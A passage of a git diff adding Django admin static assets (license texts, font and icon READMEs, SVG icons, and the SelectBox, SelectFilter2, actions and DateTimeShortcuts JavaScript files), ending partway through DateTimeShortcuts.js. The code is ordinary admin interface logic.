regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/master/static/admin/fonts/README.txt b/master/static/admin/fonts/README.txt new file mode 100644 index 0000000..b247bef --- /dev/null +++ b/master/static/admin/fonts/README.txt @@ -0,0 +1,3 @@ +Roboto webfont source: https://www.google.com/fonts/specimen/Roboto +WOFF files extracted using https://github.com/majodev/google-webfonts-helper +Weights used in this project: Light (300), Regular (400), Bold (700) diff --git a/master/static/admin/fonts/Roboto-Bold-webfont.woff b/master/static/admin/fonts/Roboto-Bold-webfont.woff new file mode 100644 index 0000000..6e0f562 Binary files /dev/null and b/master/static/admin/fonts/Roboto-Bold-webfont.woff differ diff --git a/master/static/admin/fonts/Roboto-Light-webfont.woff b/master/static/admin/fonts/Roboto-Light-webfont.woff new file mode 100644 index 0000000..b9e9918 Binary files /dev/null and b/master/static/admin/fonts/Roboto-Light-webfont.woff differ diff --git a/master/static/admin/fonts/Roboto-Regular-webfont.woff b/master/static/admin/fonts/Roboto-Regular-webfont.woff new file mode 100644 index 0000000..96c1986 Binary files /dev/null and b/master/static/admin/fonts/Roboto-Regular-webfont.woff differ diff --git a/master/static/admin/img/LICENSE b/master/static/admin/img/LICENSE new file mode 100644 index 0000000..a4faaa1 --- /dev/null +++ b/master/static/admin/img/LICENSE @@ -0,0 +1,20 @@ +The MIT License (MIT) + +Copyright (c) 2014 Code Charm Ltd + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/master/static/admin/img/README.txt b/master/static/admin/img/README.txt new file mode 100644 index 0000000..4eb2e49 --- /dev/null +++ b/master/static/admin/img/README.txt @@ -0,0 +1,7 @@ +All icons are taken from Font Awesome (http://fontawesome.io/) project. +The Font Awesome font is licensed under the SIL OFL 1.1: +- https://scripts.sil.org/OFL + +SVG icons source: https://github.com/encharm/Font-Awesome-SVG-PNG +Font-Awesome-SVG-PNG is licensed under the MIT license (see file license +in current folder). diff --git a/master/static/admin/img/calendar-icons.svg b/master/static/admin/img/calendar-icons.svg new file mode 100644 index 0000000..dbf21c3 --- /dev/null +++ b/master/static/admin/img/calendar-icons.svg @@ -0,0 +1,14 @@ + + + + + + + + + + + + + + diff --git a/master/static/admin/img/gis/move_vertex_off.svg b/master/static/admin/img/gis/move_vertex_off.svg new file mode 100644 index 0000000..228854f --- /dev/null +++ b/master/static/admin/img/gis/move_vertex_off.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/master/static/admin/img/gis/move_vertex_on.svg b/master/static/admin/img/gis/move_vertex_on.svg new file mode 100644 index 0000000..96b87fd --- /dev/null +++ b/master/static/admin/img/gis/move_vertex_on.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/master/static/admin/img/icon-addlink.svg b/master/static/admin/img/icon-addlink.svg new file mode 100644 index 0000000..e004fb1 --- /dev/null +++ b/master/static/admin/img/icon-addlink.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-alert.svg b/master/static/admin/img/icon-alert.svg new file mode 100644 index 0000000..e51ea83 --- /dev/null +++ b/master/static/admin/img/icon-alert.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-calendar.svg b/master/static/admin/img/icon-calendar.svg new file mode 100644 index 0000000..97910a9 --- /dev/null +++ b/master/static/admin/img/icon-calendar.svg @@ -0,0 +1,9 @@ + + + + + + + + + diff --git a/master/static/admin/img/icon-changelink.svg b/master/static/admin/img/icon-changelink.svg new file mode 100644 index 0000000..bbb137a --- /dev/null +++ b/master/static/admin/img/icon-changelink.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-clock.svg b/master/static/admin/img/icon-clock.svg new file mode 100644 index 0000000..bf9985d --- /dev/null +++ b/master/static/admin/img/icon-clock.svg @@ -0,0 +1,9 @@ + + + + + + + + + diff --git a/master/static/admin/img/icon-deletelink.svg b/master/static/admin/img/icon-deletelink.svg new file mode 100644 index 0000000..4059b15 --- /dev/null +++ b/master/static/admin/img/icon-deletelink.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-no.svg b/master/static/admin/img/icon-no.svg new file mode 100644 index 0000000..2e0d383 --- /dev/null +++ b/master/static/admin/img/icon-no.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-unknown-alt.svg b/master/static/admin/img/icon-unknown-alt.svg new file mode 100644 index 0000000..1c6b99f --- /dev/null +++ b/master/static/admin/img/icon-unknown-alt.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-unknown.svg b/master/static/admin/img/icon-unknown.svg new file mode 100644 index 0000000..50b4f97 --- /dev/null +++ b/master/static/admin/img/icon-unknown.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-viewlink.svg b/master/static/admin/img/icon-viewlink.svg new file mode 100644 index 0000000..a1ca1d3 --- /dev/null +++ b/master/static/admin/img/icon-viewlink.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/icon-yes.svg b/master/static/admin/img/icon-yes.svg new file mode 100644 index 0000000..5883d87 --- /dev/null +++ b/master/static/admin/img/icon-yes.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/inline-delete.svg b/master/static/admin/img/inline-delete.svg new file mode 100644 index 0000000..17d1ad6 --- /dev/null +++ b/master/static/admin/img/inline-delete.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/search.svg b/master/static/admin/img/search.svg new file mode 100644 index 0000000..c8c69b2 --- /dev/null +++ b/master/static/admin/img/search.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/selector-icons.svg b/master/static/admin/img/selector-icons.svg new file mode 100644 index 0000000..926b8e2 --- /dev/null +++ b/master/static/admin/img/selector-icons.svg @@ -0,0 +1,34 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/master/static/admin/img/sorting-icons.svg b/master/static/admin/img/sorting-icons.svg new file mode 100644 index 0000000..7c31ec9 --- /dev/null +++ b/master/static/admin/img/sorting-icons.svg @@ -0,0 +1,19 @@ + + + + + + + + + + + + + + + + + + + diff --git a/master/static/admin/img/tooltag-add.svg b/master/static/admin/img/tooltag-add.svg new file mode 100644 index 0000000..1ca64ae --- /dev/null +++ b/master/static/admin/img/tooltag-add.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/img/tooltag-arrowright.svg b/master/static/admin/img/tooltag-arrowright.svg new file mode 100644 index 0000000..b664d61 --- /dev/null +++ b/master/static/admin/img/tooltag-arrowright.svg @@ -0,0 +1,3 @@ + + + diff --git a/master/static/admin/js/SelectBox.js b/master/static/admin/js/SelectBox.js new file mode 100644 index 0000000..1927b4c --- /dev/null +++ b/master/static/admin/js/SelectBox.js @@ -0,0 +1,110 @@ +'use strict'; +{ + const SelectBox = { + cache: {}, + init: function(id) { + const box = document.getElementById(id); + SelectBox.cache[id] = []; + const cache = SelectBox.cache[id]; + for (const node of box.options) { + cache.push({value: node.value, text: node.text, displayed: 1}); + } + }, + redisplay: function(id) { + // Repopulate HTML select box from cache + const box = document.getElementById(id); + box.innerHTML = ''; + for (const node of SelectBox.cache[id]) { + if (node.displayed) { + const new_option = new Option(node.text, node.value, false, false); + // Shows a tooltip when hovering over the option + new_option.title = node.text; + box.appendChild(new_option); + } + } + }, + filter: function(id, text) { + // Redisplay the HTML select box, displaying only the choices containing ALL + // the words in text. (It's an AND search.) + const tokens = text.toLowerCase().split(/\s+/); + for (const node of SelectBox.cache[id]) { + node.displayed = 1; + const node_text = node.text.toLowerCase(); + for (const token of tokens) { + if (node_text.indexOf(token) === -1) { + node.displayed = 0; + break; // Once the first token isn't found we're done + } + } + } + SelectBox.redisplay(id); + }, + delete_from_cache: function(id, value) { + let delete_index = null; + const cache = SelectBox.cache[id]; + for (const [i, node] of cache.entries()) { + if (node.value === value) { + delete_index = i; + break; + } + } + cache.splice(delete_index, 1); + }, + add_to_cache: function(id, option) { + SelectBox.cache[id].push({value: option.value, text: option.text, displayed: 1}); + }, + cache_contains: function(id, value) { + // Check if an item is contained in the cache + for (const node of SelectBox.cache[id]) { + if (node.value === value) { + return true; + } + } + return false; + }, + move: function(from, to) { + const from_box = document.getElementById(from); + for (const option of from_box.options) { + const option_value = option.value; + if (option.selected && SelectBox.cache_contains(from, option_value)) { + SelectBox.add_to_cache(to, {value: option_value, text: option.text, displayed: 1}); + SelectBox.delete_from_cache(from, option_value); + } + } + SelectBox.redisplay(from); + SelectBox.redisplay(to); + }, + move_all: function(from, to) { + const from_box = document.getElementById(from); + for (const option of from_box.options) { + const option_value = option.value; + if (SelectBox.cache_contains(from, option_value)) { + SelectBox.add_to_cache(to, {value: option_value, text: option.text, displayed: 1}); + SelectBox.delete_from_cache(from, option_value); + } + } + SelectBox.redisplay(from); + SelectBox.redisplay(to); + }, + sort: function(id) { + SelectBox.cache[id].sort(function(a, b) { + a = a.text.toLowerCase(); + b = b.text.toLowerCase(); + if (a > b) { + return 1; + } + if (a < b) { + return -1; + } + return 0; + } ); + }, + select_all: function(id) { + const box = document.getElementById(id); + for (const option of box.options) { + option.selected = true; + } + } + }; + window.SelectBox = SelectBox; +} diff --git a/master/static/admin/js/SelectFilter2.js b/master/static/admin/js/SelectFilter2.js new file mode 100644 index 0000000..6c709a0 --- /dev/null +++ b/master/static/admin/js/SelectFilter2.js @@ -0,0 +1,236 @@ +/*global SelectBox, gettext, interpolate, quickElement, SelectFilter*/ +/* +SelectFilter2 - Turns a multiple-select box into a filter interface. + +Requires core.js and SelectBox.js. +*/ +'use strict'; +{ + window.SelectFilter = { + init: function(field_id, field_name, is_stacked) { + if (field_id.match(/__prefix__/)) { + // Don't initialize on empty forms. + return; + } + const from_box = document.getElementById(field_id); + from_box.id += '_from'; // change its ID + from_box.className = 'filtered'; + + for (const p of from_box.parentNode.getElementsByTagName('p')) { + if (p.classList.contains("info")) { + // Remove

, because it just gets in the way. + from_box.parentNode.removeChild(p); + } else if (p.classList.contains("help")) { + // Move help text up to the top so it isn't below the select + // boxes or wrapped off on the side to the right of the add + // button: + from_box.parentNode.insertBefore(p, from_box.parentNode.firstChild); + } + } + + //

or
+ const selector_div = quickElement('div', from_box.parentNode); + selector_div.className = is_stacked ? 'selector stacked' : 'selector'; + + //
+ const selector_available = quickElement('div', selector_div); + selector_available.className = 'selector-available'; + const title_available = quickElement('h2', selector_available, interpolate(gettext('Available %s') + ' ', [field_name])); + quickElement( + 'span', title_available, '', + 'class', 'help help-tooltip help-icon', + 'title', interpolate( + gettext( + 'This is the list of available %s. You may choose some by ' + + 'selecting them in the box below and then clicking the ' + + '"Choose" arrow between the two boxes.' + ), + [field_name] + ) + ); + + const filter_p = quickElement('p', selector_available, '', 'id', field_id + '_filter'); + filter_p.className = 'selector-filter'; + + const search_filter_label = quickElement('label', filter_p, '', 'for', field_id + '_input'); + + quickElement( + 'span', search_filter_label, '', + 'class', 'help-tooltip search-label-icon', + 'title', interpolate(gettext("Type into this box to filter down the list of available %s."), [field_name]) + ); + + filter_p.appendChild(document.createTextNode(' ')); + + const filter_input = quickElement('input', filter_p, '', 'type', 'text', 'placeholder', gettext("Filter")); + filter_input.id = field_id + '_input'; + + selector_available.appendChild(from_box); + const choose_all = quickElement('a', selector_available, gettext('Choose all'), 'title', interpolate(gettext('Click to choose all %s at once.'), [field_name]), 'href', '#', 'id', field_id + '_add_all_link'); + choose_all.className = 'selector-chooseall'; + + //
    + const selector_chooser = quickElement('ul', selector_div); + selector_chooser.className = 'selector-chooser'; + const add_link = quickElement('a', quickElement('li', selector_chooser), gettext('Choose'), 'title', gettext('Choose'), 'href', '#', 'id', field_id + '_add_link'); + add_link.className = 'selector-add'; + const remove_link = quickElement('a', quickElement('li', selector_chooser), gettext('Remove'), 'title', gettext('Remove'), 'href', '#', 'id', field_id + '_remove_link'); + remove_link.className = 'selector-remove'; + + //
    + const selector_chosen = quickElement('div', selector_div); + selector_chosen.className = 'selector-chosen'; + const title_chosen = quickElement('h2', selector_chosen, interpolate(gettext('Chosen %s') + ' ', [field_name])); + quickElement( + 'span', title_chosen, '', + 'class', 'help help-tooltip help-icon', + 'title', interpolate( + gettext( + 'This is the list of chosen %s. You may remove some by ' + + 'selecting them in the box below and then clicking the ' + + '"Remove" arrow between the two boxes.' + ), + [field_name] + ) + ); + + const to_box = quickElement('select', selector_chosen, '', 'id', field_id + '_to', 'multiple', '', 'size', from_box.size, 'name', from_box.name); + to_box.className = 'filtered'; + const clear_all = quickElement('a', selector_chosen, gettext('Remove all'), 'title', interpolate(gettext('Click to remove all chosen %s at once.'), [field_name]), 'href', '#', 'id', field_id + '_remove_all_link'); + clear_all.className = 'selector-clearall'; + + from_box.name = from_box.name + '_old'; + + // Set up the JavaScript event handlers for the select box filter interface + const move_selection = function(e, elem, move_func, from, to) { + if (elem.classList.contains('active')) { + move_func(from, to); + SelectFilter.refresh_icons(field_id); + } + e.preventDefault(); + }; + choose_all.addEventListener('click', function(e) { + move_selection(e, this, SelectBox.move_all, field_id + '_from', field_id + '_to'); + }); + add_link.addEventListener('click', function(e) { + move_selection(e, this, SelectBox.move, field_id + '_from', field_id + '_to'); + }); + remove_link.addEventListener('click', function(e) { + move_selection(e, this, SelectBox.move, field_id + '_to', field_id + '_from'); + }); + clear_all.addEventListener('click', function(e) { + move_selection(e, this, SelectBox.move_all, field_id + '_to', field_id + '_from'); + }); + filter_input.addEventListener('keypress', function(e) { + SelectFilter.filter_key_press(e, field_id); + }); + filter_input.addEventListener('keyup', function(e) { + SelectFilter.filter_key_up(e, field_id); + }); + filter_input.addEventListener('keydown', function(e) { + SelectFilter.filter_key_down(e, field_id); + }); + selector_div.addEventListener('change', function(e) { + if (e.target.tagName === 'SELECT') { + SelectFilter.refresh_icons(field_id); + } + }); + selector_div.addEventListener('dblclick', function(e) { + if (e.target.tagName === 'OPTION') { + if (e.target.closest('select').id === field_id + '_to') { + SelectBox.move(field_id + '_to', field_id + '_from'); + } else { + SelectBox.move(field_id + '_from', field_id + '_to'); + } + SelectFilter.refresh_icons(field_id); + } + }); + from_box.closest('form').addEventListener('submit', function() { + SelectBox.select_all(field_id + '_to'); + }); + SelectBox.init(field_id + '_from'); + SelectBox.init(field_id + '_to'); + // Move selected from_box options to to_box + SelectBox.move(field_id + '_from', field_id + '_to'); + + if (!is_stacked) { + // In horizontal mode, give the same height to the two boxes. + const j_from_box = document.getElementById(field_id + '_from'); + const j_to_box = document.getElementById(field_id + '_to'); + let height = filter_p.offsetHeight + j_from_box.offsetHeight; + + const j_to_box_style = window.getComputedStyle(j_to_box); + if (j_to_box_style.getPropertyValue('box-sizing') === 'border-box') { + // Add the padding and border to the final height. + height += parseInt(j_to_box_style.getPropertyValue('padding-top'), 10) + + parseInt(j_to_box_style.getPropertyValue('padding-bottom'), 10) + + parseInt(j_to_box_style.getPropertyValue('border-top-width'), 10) + + parseInt(j_to_box_style.getPropertyValue('border-bottom-width'), 10); + } + + j_to_box.style.height = height + 'px'; + } + + // Initial icon refresh + SelectFilter.refresh_icons(field_id); + }, + any_selected: function(field) { + // Temporarily add the required attribute and check validity. + field.required = true; + const any_selected = field.checkValidity(); + field.required = false; + return any_selected; + }, + refresh_icons: function(field_id) { + const from = document.getElementById(field_id + '_from'); + const to = document.getElementById(field_id + '_to'); + // Active if at least one item is selected + document.getElementById(field_id + '_add_link').classList.toggle('active', SelectFilter.any_selected(from)); + document.getElementById(field_id + '_remove_link').classList.toggle('active', SelectFilter.any_selected(to)); + // Active if the corresponding box isn't empty + document.getElementById(field_id + '_add_all_link').classList.toggle('active', from.querySelector('option')); + document.getElementById(field_id + '_remove_all_link').classList.toggle('active', to.querySelector('option')); + }, + filter_key_press: function(event, field_id) { + const from = document.getElementById(field_id + '_from'); + // don't submit form if user pressed Enter + if ((event.which && event.which === 13) || (event.keyCode && event.keyCode === 13)) { + from.selectedIndex = 0; + SelectBox.move(field_id + '_from', field_id + '_to'); + from.selectedIndex = 0; + event.preventDefault(); + } + }, + filter_key_up: function(event, field_id) { + const from = document.getElementById(field_id + '_from'); + const temp = from.selectedIndex; + SelectBox.filter(field_id + '_from', document.getElementById(field_id + '_input').value); + from.selectedIndex = temp; + }, + filter_key_down: function(event, field_id) { + const from = document.getElementById(field_id + '_from'); + // right arrow -- move across + if ((event.which && event.which === 39) || (event.keyCode && event.keyCode === 39)) { + const old_index = from.selectedIndex; + SelectBox.move(field_id + '_from', field_id + '_to'); + from.selectedIndex = (old_index === from.length) ? from.length - 1 : old_index; + return; + } + // down arrow -- wrap around + if ((event.which && event.which === 40) || (event.keyCode && event.keyCode === 40)) { + from.selectedIndex = (from.length === from.selectedIndex + 1) ? 0 : from.selectedIndex + 1; + } + // up arrow -- wrap around + if ((event.which && event.which === 38) || (event.keyCode && event.keyCode === 38)) { + from.selectedIndex = (from.selectedIndex === 0) ? from.length - 1 : from.selectedIndex - 1; + } + } + }; + + window.addEventListener('load', function(e) { + document.querySelectorAll('select.selectfilter, select.selectfilterstacked').forEach(function(el) { + const data = el.dataset; + SelectFilter.init(el.id, data.fieldName, parseInt(data.isStacked, 10)); + }); + }); +} diff --git a/master/static/admin/js/actions.js b/master/static/admin/js/actions.js new file mode 100644 index 0000000..dae6992 --- /dev/null +++ b/master/static/admin/js/actions.js @@ -0,0 +1,154 @@ +/*global gettext, interpolate, ngettext*/ +'use strict'; +{ + const $ = django.jQuery; + let lastChecked; + + $.fn.actions = function(opts) { + const options = $.extend({}, $.fn.actions.defaults, opts); + const actionCheckboxes = $(this); + let list_editable_changed = false; + const showQuestion = function() { + $(options.acrossClears).hide(); + $(options.acrossQuestions).show(); + $(options.allContainer).hide(); + }, + showClear = function() { + $(options.acrossClears).show(); + $(options.acrossQuestions).hide(); + $(options.actionContainer).toggleClass(options.selectedClass); + $(options.allContainer).show(); + $(options.counterContainer).hide(); + }, + reset = function() { + $(options.acrossClears).hide(); + $(options.acrossQuestions).hide(); + $(options.allContainer).hide(); + $(options.counterContainer).show(); + }, + clearAcross = function() { + reset(); + $(options.acrossInput).val(0); + $(options.actionContainer).removeClass(options.selectedClass); + }, + checker = function(checked) { + if (checked) { + showQuestion(); + } else { + reset(); + } + $(actionCheckboxes).prop("checked", checked) + .parent().parent().toggleClass(options.selectedClass, checked); + }, + updateCounter = function() { + const sel = $(actionCheckboxes).filter(":checked").length; + // data-actions-icnt is defined in the generated HTML + // and contains the total amount of objects in the queryset + const actions_icnt = $('.action-counter').data('actionsIcnt'); + $(options.counterContainer).html(interpolate( + ngettext('%(sel)s of %(cnt)s selected', '%(sel)s of %(cnt)s selected', sel), { + sel: sel, + cnt: actions_icnt + }, true)); + $(options.allToggle).prop("checked", function() { + let value; + if (sel === actionCheckboxes.length) { + value = true; + showQuestion(); + } else { + value = false; + clearAcross(); + } + return value; + }); + }; + // Show counter by default + $(options.counterContainer).show(); + // Check state of checkboxes and reinit state if needed + $(this).filter(":checked").each(function(i) { + $(this).parent().parent().toggleClass(options.selectedClass); + updateCounter(); + if ($(options.acrossInput).val() === 1) { + showClear(); + } + }); + $(options.allToggle).show().on('click', function() { + checker($(this).prop("checked")); + updateCounter(); + }); + $("a", options.acrossQuestions).on('click', function(event) { + event.preventDefault(); + $(options.acrossInput).val(1); + showClear(); + }); + $("a", options.acrossClears).on('click', function(event) { + event.preventDefault(); + $(options.allToggle).prop("checked", false); + clearAcross(); + checker(0); + updateCounter(); + }); + lastChecked = null; + $(actionCheckboxes).on('click', function(event) { + if (!event) { event = window.event; } + const target = event.target ? event.target : event.srcElement; + if (lastChecked && $.data(lastChecked) !== $.data(target) && event.shiftKey === true) { + let inrange = false; + $(lastChecked).prop("checked", target.checked) + .parent().parent().toggleClass(options.selectedClass, target.checked); + $(actionCheckboxes).each(function() { + if ($.data(this) === $.data(lastChecked) || $.data(this) === $.data(target)) { + inrange = (inrange) ? false : true; + } + if (inrange) { + $(this).prop("checked", target.checked) + .parent().parent().toggleClass(options.selectedClass, target.checked); + } + }); + } + $(target).parent().parent().toggleClass(options.selectedClass, target.checked); + lastChecked = target; + updateCounter(); + }); + $('form#changelist-form table#result_list tr').on('change', 'td:gt(0) :input', function() { + list_editable_changed = true; + }); + $('form#changelist-form button[name="index"]').on('click', function(event) { + if (list_editable_changed) { + return confirm(gettext("You have unsaved changes on individual editable fields. If you run an action, your unsaved changes will be lost.")); + } + }); + $('form#changelist-form input[name="_save"]').on('click', function(event) { + let action_changed = false; + $('select option:selected', options.actionContainer).each(function() { + if ($(this).val()) { + action_changed = true; + } + }); + if (action_changed) { + if (list_editable_changed) { + return confirm(gettext("You have selected an action, but you haven’t saved your changes to individual fields yet. Please click OK to save. You’ll need to re-run the action.")); + } else { + return confirm(gettext("You have selected an action, and you haven’t made any changes on individual fields. You’re probably looking for the Go button rather than the Save button.")); + } + } + }); + }; + /* Setup plugin defaults */ + $.fn.actions.defaults = { + actionContainer: "div.actions", + counterContainer: "span.action-counter", + allContainer: "div.actions span.all", + acrossInput: "div.actions input.select-across", + acrossQuestions: "div.actions span.question", + acrossClears: "div.actions span.clear", + allToggle: "#action-toggle", + selectedClass: "selected" + }; + $(document).ready(function() { + const $actionsEls = $('tr input.action-select'); + if ($actionsEls.length > 0) { + $actionsEls.actions(); + } + }); +} diff --git a/master/static/admin/js/actions.min.js b/master/static/admin/js/actions.min.js new file mode 100644 index 0000000..29fd0d8 --- /dev/null +++ b/master/static/admin/js/actions.min.js @@ -0,0 +1,7 @@ +'use strict';{const a=django.jQuery;let e;a.fn.actions=function(g){const b=a.extend({},a.fn.actions.defaults,g),f=a(this);let k=!1;const l=function(){a(b.acrossClears).hide();a(b.acrossQuestions).show();a(b.allContainer).hide()},m=function(){a(b.acrossClears).show();a(b.acrossQuestions).hide();a(b.actionContainer).toggleClass(b.selectedClass);a(b.allContainer).show();a(b.counterContainer).hide()},n=function(){a(b.acrossClears).hide();a(b.acrossQuestions).hide();a(b.allContainer).hide();a(b.counterContainer).show()}, +p=function(){n();a(b.acrossInput).val(0);a(b.actionContainer).removeClass(b.selectedClass)},q=function(c){c?l():n();a(f).prop("checked",c).parent().parent().toggleClass(b.selectedClass,c)},h=function(){const c=a(f).filter(":checked").length,d=a(".action-counter").data("actionsIcnt");a(b.counterContainer).html(interpolate(ngettext("%(sel)s of %(cnt)s selected","%(sel)s of %(cnt)s selected",c),{sel:c,cnt:d},!0));a(b.allToggle).prop("checked",function(){let a;c===f.length?(a=!0,l()):(a=!1,p());return a})}; +a(b.counterContainer).show();a(this).filter(":checked").each(function(c){a(this).parent().parent().toggleClass(b.selectedClass);h();1===a(b.acrossInput).val()&&m()});a(b.allToggle).show().on("click",function(){q(a(this).prop("checked"));h()});a("a",b.acrossQuestions).on("click",function(c){c.preventDefault();a(b.acrossInput).val(1);m()});a("a",b.acrossClears).on("click",function(c){c.preventDefault();a(b.allToggle).prop("checked",!1);p();q(0);h()});e=null;a(f).on("click",function(c){c||(c=window.event); +const d=c.target?c.target:c.srcElement;if(e&&a.data(e)!==a.data(d)&&!0===c.shiftKey){let c=!1;a(e).prop("checked",d.checked).parent().parent().toggleClass(b.selectedClass,d.checked);a(f).each(function(){if(a.data(this)===a.data(e)||a.data(this)===a.data(d))c=c?!1:!0;c&&a(this).prop("checked",d.checked).parent().parent().toggleClass(b.selectedClass,d.checked)})}a(d).parent().parent().toggleClass(b.selectedClass,d.checked);e=d;h()});a("form#changelist-form table#result_list tr").on("change","td:gt(0) :input", +function(){k=!0});a('form#changelist-form button[name="index"]').on("click",function(a){if(k)return confirm(gettext("You have unsaved changes on individual editable fields. If you run an action, your unsaved changes will be lost."))});a('form#changelist-form input[name="_save"]').on("click",function(c){let d=!1;a("select option:selected",b.actionContainer).each(function(){a(this).val()&&(d=!0)});if(d)return k?confirm(gettext("You have selected an action, but you haven\u2019t saved your changes to individual fields yet. Please click OK to save. You\u2019ll need to re-run the action.")): +confirm(gettext("You have selected an action, and you haven\u2019t made any changes on individual fields. You\u2019re probably looking for the Go button rather than the Save button."))})};a.fn.actions.defaults={actionContainer:"div.actions",counterContainer:"span.action-counter",allContainer:"div.actions span.all",acrossInput:"div.actions input.select-across",acrossQuestions:"div.actions span.question",acrossClears:"div.actions span.clear",allToggle:"#action-toggle",selectedClass:"selected"};a(document).ready(function(){const g= +a("tr input.action-select");0 +// +'use strict'; +{ + const DateTimeShortcuts = { + calendars: [], + calendarInputs: [], + clockInputs: [], + clockHours: { + default_: [ + [gettext_noop('Now'), -1], + [gettext_noop('Midnight'), 0], + [gettext_noop('6 a.m.'), 6], + [gettext_noop('Noon'), 12], + [gettext_noop('6 p.m.'), 18] + ] + }, + dismissClockFunc: [], + dismissCalendarFunc: [], + calendarDivName1: 'calendarbox', // name of calendar
    that gets toggled + calendarDivName2: 'calendarin', // name of
    that contains calendar + calendarLinkName: 'calendarlink', // name of the link that is used to toggle + clockDivName: 'clockbox', // name of clock
    that gets toggled + clockLinkName: 'clocklink', // name of the link that is used to toggle + shortCutsClass: 'datetimeshortcuts', // class of the clock and cal shortcuts + timezoneWarningClass: 'timezonewarning', // class of the warning for timezone mismatch + timezoneOffset: 0, + init: function() { + const body = document.getElementsByTagName('body')[0]; + const serverOffset = body.dataset.adminUtcOffset; + if (serverOffset) { + const localOffset = new Date().getTimezoneOffset() * -60; + DateTimeShortcuts.timezoneOffset = localOffset - serverOffset; + } + + for (const inp of document.getElementsByTagName('input')) { + if (inp.type === 'text' && inp.classList.contains('vTimeField')) { + DateTimeShortcuts.addClock(inp); + DateTimeShortcuts.addTimezoneWarning(inp); + } + else if (inp.type === 'text' && inp.classList.contains('vDateField')) { + DateTimeShortcuts.addCalendar(inp); + DateTimeShortcuts.addTimezoneWarning(inp); + } + } + }, + // Return the current time while accounting for the server timezone. + now: function() { + const body = document.getElementsByTagName('body')[0]; + const serverOffset = body.dataset.adminUtcOffset; + if (serverOffset) { + const localNow = new Date(); + const localOffset = localNow.getTimezoneOffset() * -60; + localNow.setTime(localNow.getTime() + 1000 * (serverOffset - localOffset)); + return localNow; + } else { + return new Date(); + } + }, + // Add a warning when the time zone in the browser and backend do not match. + addTimezoneWarning: function(inp) { + const warningClass = DateTimeShortcuts.timezoneWarningClass; + let timezoneOffset = DateTimeShortcuts.timezoneOffset / 3600; + + // Only warn if there is a time zone mismatch. + if (!timezoneOffset) { + return; + } + + // Check if warning is already there. + if (inp.parentNode.querySelectorAll('.' + warningClass).length) { + return; + } + + let message; + if (timezoneOffset > 0) { + message = ngettext( + 'Note: You are %s hour ahead of server time.', + 'Note: You are %s hours ahead of server time.', + timezoneOffset + ); + } + else { + timezoneOffset *= -1; + message = ngettext( + 